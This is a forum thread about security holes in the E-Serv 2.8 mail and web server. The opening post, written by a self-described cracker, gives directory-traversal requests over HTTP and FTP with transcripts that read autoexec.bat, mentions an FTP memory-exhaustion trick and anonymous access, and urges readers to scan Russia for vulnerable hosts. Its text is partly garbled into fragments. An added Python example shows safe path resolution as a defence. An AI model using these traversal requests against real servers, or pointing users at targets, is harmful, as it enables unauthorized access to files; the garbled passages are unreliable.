Thread: Russia Security

  1. #1
    I am a cracker
    Guest

    Russia Security

    Last night when I was on the Internet at 4:20 am I was "chillin" like usual. I wanted to see if I could find security issues in other countries (besides America). Let me tell you, other countries, China, Russia etc., have many, many security problems and holes, and this is what I found:
    FTP russia security

    The first occurs when the daemon is fed over 40 or
    so "USER whatever" strings. The FTP runs out of memory.
    E-Serv is a SMTP, POP3, NNTP, FTP, HTTP, Proxy,
    When testing out The HTTP server on a computer is
    accessible by default on Port 3128 and will most probably be moved to port 80 on
    servers where it's being used as a webserver (It is also the Proxy's remote
    administration), I found it to have a very serious security flaw. All
    versions prior to 2.8 are vulnerable. Regardless, updated versions are still common and I don't think the vulnerability
    has been covered publicly here at antionline.com, so here it is!

    [drew@Tali-fusion]$ telnet .windows.box 3128
    Trying 192.168.66.7...
    Connected to tali.windoze.box.
    Escape character is '^]'.
    GET /../../../../../../../../../../../../../../autoexec.bat HTTP/1.1

    HTTP/1.1 200 OK
    Content-Length: 597

    @echo off
    SET BLASTER=A220 I5 D1 T4
    PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\JDK\BIN

    CHOICE /C:YN /T:N,05 "Load SoftICE Debugger?"
    If Errorlevel=2 Goto End
    If Errorlevel=1 goto Softice

    :SoftIce
    echo Softice Loading
    C:\wyze1\exec\SOFTICE\WINICE.EXE
    goto end
    :End
    echo Starting Windows

    C:\wyze1>ftp localhost
    Connected to
    220 Eserv/2.8 FTP ready
    User (none)): anonymous
    331 Password required
    Password:
    230 Login OK
    ftp> ls /../../../../../../../../../../../
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> ls ../../../../../../../../../../../
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> ls
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp> get ../../../../../../../../../autoexec.bat
    200 PORT command successful.
    150 Opening data connection
    226 Transfer complete
    ftp: 425 bytes received in 0.05Seconds 8.42Kbytes/sec.
    ftp> quit
    221 Goodbye.

    . Also that the FTP server will be on port
    3121 by default, and may be moved to port 21 on some computers

    that will probably apply to current versions
    as well: so an E-Serv server can be a nice anonymous mail pickup for anyone who cares
    to connect to the POP3 daemon and login anonymously. The daemon also does
    stuff like making the modem dial/hangup CGI feature (http://host:3128/dial)
    accessible to anyone with a user-level login, including anonymous, although it
    can be configured to be admin only, is like this by default. for the
    webmail interface accepting anonymous logins. - A hint: looking
    for lamers that run E-Serv? Scan Russia.
    hope this helps
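
The `GET /../../autoexec.bat` request in the transcript above is a directory traversal: the requested path resolves outside the directory the server is meant to publish. The following Python is an added example, not part of the original post and not E-Serv's code; it assumes a server that maps request paths onto a document root, and its function names and temporary directory layout are constructed for illustration. It sets a join-and-trust resolver beside one that canonicalizes the path and checks containment before any file is opened.

```python
import os
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    """The request path resolves outside the document root."""


def naive_resolve(docroot, target):
    # Flawed pattern (assumed, for illustration): join and trust the result.
    path = unquote(target.split("?", 1)[0])
    return os.path.normpath(docroot + path)


def safe_resolve(docroot, target):
    root = os.path.realpath(docroot)
    # Decode exactly once, then validate the decoded form that will be used.
    path = unquote(target.split("?", 1)[0])
    if "\x00" in path:
        raise TraversalError("NUL byte in path")
    # Backslash is also a separator on the Windows hosts shown in the post.
    rel = path.replace("\\", "/").lstrip("/")
    # realpath collapses ".." and follows symlinks before the containment check.
    candidate = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, candidate]) != root:
        raise TraversalError(target)
    return candidate


def build_sample_tree():
    # Constructed layout: <tmp>/autoexec.bat sits one level above <tmp>/wwwroot.
    base = os.path.realpath(tempfile.mkdtemp())
    docroot = os.path.join(base, "wwwroot")
    os.mkdir(docroot)
    outside = os.path.join(base, "autoexec.bat")
    for name in (outside, os.path.join(docroot, "index.html")):
        with open(name, "w") as fh:
            fh.write("constructed sample\n")
    return docroot, outside


if __name__ == "__main__":
    docroot, outside = build_sample_tree()
    for target in ("/index.html", "/../autoexec.bat", "/..%2f..%2fautoexec.bat"):
        try:
            print(target, "->", safe_resolve(docroot, target))
        except TraversalError:
            print(target, "-> rejected")
    print("naive:", naive_resolve(docroot, "/../autoexec.bat"))
```

The same containment check applies to the FTP `get` path in the second transcript: resolve the argument against the user's root and refuse it if the canonical result is not underneath that root.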

  2. #2
    Senior Member
    Join Date
    Dec 2001
    Posts
    137
    Hmm, interesting..... I wonder why these countries don't upgrade their systems? I searched Google for E-serv 2.8 and I got a bunch of listings of this exploit.... weird. Maybe they don't care.. LOL
    My two cents,
    XPaCiScOoL

    "Your Smallest Flaw is my greatest Strength." - Me

  3. #3
    Banned
    Join Date
    Oct 2001
    Posts
    1,459
    I'm from Russia.. And if you think this security is lax, try finding a website from a 3rd world country; the security there would be horrible... I'm not even trying to defend my country, because it's true... The level of computer security there sucks ass... But if you look at any .ru website that isn't hosted off of some guy's 50MHz Win95 box, you will see that the websites are actually secure.
